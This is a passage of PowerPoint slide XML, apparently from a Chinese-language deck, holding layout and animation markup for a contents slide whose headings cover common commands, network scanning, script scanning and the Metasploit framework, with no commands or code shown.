          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
